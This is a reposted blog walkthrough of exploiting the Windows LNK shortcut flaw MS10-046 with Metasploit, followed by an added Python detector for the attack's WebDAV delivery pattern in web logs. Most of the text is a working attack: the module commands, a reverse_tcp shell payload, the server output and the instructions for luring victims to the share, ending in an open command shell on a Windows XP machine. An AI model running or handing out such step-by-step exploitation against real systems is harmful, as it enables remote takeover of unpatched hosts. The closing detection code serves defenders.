[Repost] Hands-on walkthrough of the Microsoft LNK vulnerability

Download the latest version of the Metasploit Framework exploitation toolkit; it already contains the lnk exploit module.
Metasploit Framework website: http://www.metasploit.com

msf > search lnk        # search for the lnk exploit module; if you are not on the latest version, update with svn update first.
[*] Searching loaded modules for pattern lnk...
Exploits
========

Name                                                Rank       Description
----                                                ----       -----------
windows/browser/ms10_046_shortcut_icon_dllloader    excellent  Microsoft Windows Shell LNK Code Execution
msf > use windows/browser/ms10_046_shortcut_icon_dllloader      # select the exploit module
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/shell/reverse_tcp    # attach the shellcode payload to the exploit
payload => windows/shell/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set lhost 192.168.12.110
lhost => 192.168.12.110
msf exploit(ms10_046_shortcut_icon_dllloader) > set srvhost 192.168.12.110
srvhost => 192.168.12.110
msf exploit(ms10_046_shortcut_icon_dllloader) > show options

Module options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  192.168.12.110   yes       The local host to listen on.
SRVPORT  80               yes       The daemon port to listen on (do not change)
UNCHOST                   no        The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH  /                yes       The URI to use (do not change).


Payload options (windows/shell/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process
LHOST     192.168.12.110   yes       The listen address
LPORT     4444             yes       The listen port


Exploit target:
Id  Name
--  ----
0   Automatic


msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.
msf exploit(ms10_046_shortcut_icon_dllloader) >
[*] Started reverse handler on 192.168.12.110:4444
[*]
[*] Send vulnerable clients to \\192.168.12.110\LjWqptMQY\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*]
[*] Using URL: http://192.168.12.110:80/
[*] Server started.
Now, as soon as the target enters http://192.168.12.110:80 in a browser, or the two files under \\192.168.12.110\LjWqptMQY\ are copied onto another machine and opened in Explorer, a shell comes back.
[*] Sending UNC redirect to 192.168.12.110:4611 ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4622 /LjWqptMQY
[*] Sending 301 for /LjWqptMQY ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4622 /LjWqptMQY/
[*] Sending directory multistatus for /LjWqptMQY/ ...
[*] Responding to WebDAV OPTIONS request from 192.168.12.110:4624
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY
[*] Sending 301 for /LjWqptMQY ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/
[*] Sending directory multistatus for /LjWqptMQY/ ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY
[*] Sending 301 for /LjWqptMQY ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/
[*] Sending directory multistatus for /LjWqptMQY/ ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY
[*] Sending 301 for /LjWqptMQY ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/
[*] Sending directory multistatus for /LjWqptMQY/ ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/desktop.ini
[*] Sending 404 for /LjWqptMQY/desktop.ini ...
[*] Sending LNK file to 192.168.12.110:4624 ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/PUcA.dll.manifest
[*] Sending 404 for /LjWqptMQY/PUcA.dll.manifest ...
[*] Sending DLL payload 192.168.12.110:4624 ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/PUcA.dll.123.Manifest
[*] Sending 404 for /LjWqptMQY/PUcA.dll.123.Manifest ...
[*] Sending stage (240 bytes) to 192.168.12.110
[*] Command shell session 1 opened (192.168.12.110:4444 -> 192.168.12.110:4625) at 2010-08-14 10:10:13 +0800
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [版本 5.1.2600]
C:\Documents and Settings\test\桌面>
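As an added example (not part of the original post), a defender-side check for the delivery pattern visible in the MSF output above: a WebDAV PROPFIND on a directory followed by the same client fetching a .lnk and a .dll from it. The log format, client addresses and file names below are constructed assumptions; the directory name reuses the one from the walkthrough.

```python
import re
from collections import defaultdict

# Constructed sample log (Common Log Format plus the destination host as a
# trailing field). The first four lines mirror the WebDAV exchange in the
# MSF output: PROPFIND on the share, desktop.ini probe, the .lnk, the DLL.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Aug/2010:10:10:05 +0800] "PROPFIND /LjWqptMQY/ HTTP/1.1" 207 512 192.168.12.110
10.0.0.5 - - [14/Aug/2010:10:10:06 +0800] "GET /LjWqptMQY/desktop.ini HTTP/1.1" 404 0 192.168.12.110
10.0.0.5 - - [14/Aug/2010:10:10:06 +0800] "GET /LjWqptMQY/Q3pxU.lnk HTTP/1.1" 200 870 192.168.12.110
10.0.0.5 - - [14/Aug/2010:10:10:07 +0800] "GET /LjWqptMQY/PUcA.dll HTTP/1.1" 200 8192 192.168.12.110
10.0.0.7 - - [14/Aug/2010:10:12:00 +0800] "GET /index.html HTTP/1.1" 200 1024 intranet.example
10.0.0.7 - - [14/Aug/2010:10:12:01 +0800] "GET /setup.lnk HTTP/1.1" 200 870 intranet.example
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ (?P<host>\S+)$'
)

def find_lnk_dll_over_webdav(log_text):
    """Return one finding per (client, host, directory) in which the client
    issued a PROPFIND and then fetched both a .lnk and a .dll from that
    directory: the shape of the MS10-046 WebDAV delivery seen above."""
    state = defaultdict(lambda: {"propfind": False, "lnk": [], "dll": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the scan
        method, path = m.group("method"), m.group("path")
        if method == "PROPFIND":
            # PROPFIND may name the directory with or without a trailing slash
            directory = path if path.endswith("/") else path + "/"
        else:
            directory = path.rsplit("/", 1)[0] + "/"
        entry = state[(m.group("client"), m.group("host"), directory)]
        if method == "PROPFIND":
            entry["propfind"] = True
        elif m.group("status") == "200":
            if path.lower().endswith(".lnk"):
                entry["lnk"].append(path)
            elif path.lower().endswith(".dll"):
                entry["dll"].append(path)
    findings = []
    for (client, host, directory), e in state.items():
        if e["propfind"] and e["lnk"] and e["dll"]:
            findings.append({"client": client, "host": host,
                             "directory": directory, "lnk": e["lnk"], "dll": e["dll"]})
    return findings
```

A plain .lnk download from an internal server with no PROPFIND and no DLL beside it (the last two sample lines) is deliberately not flagged, which keeps the check focused on the shortcut-plus-DLL-over-WebDAV combination rather than on every shortcut file.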
This article is reposted from www.benkui.com; further reposting is not restricted.
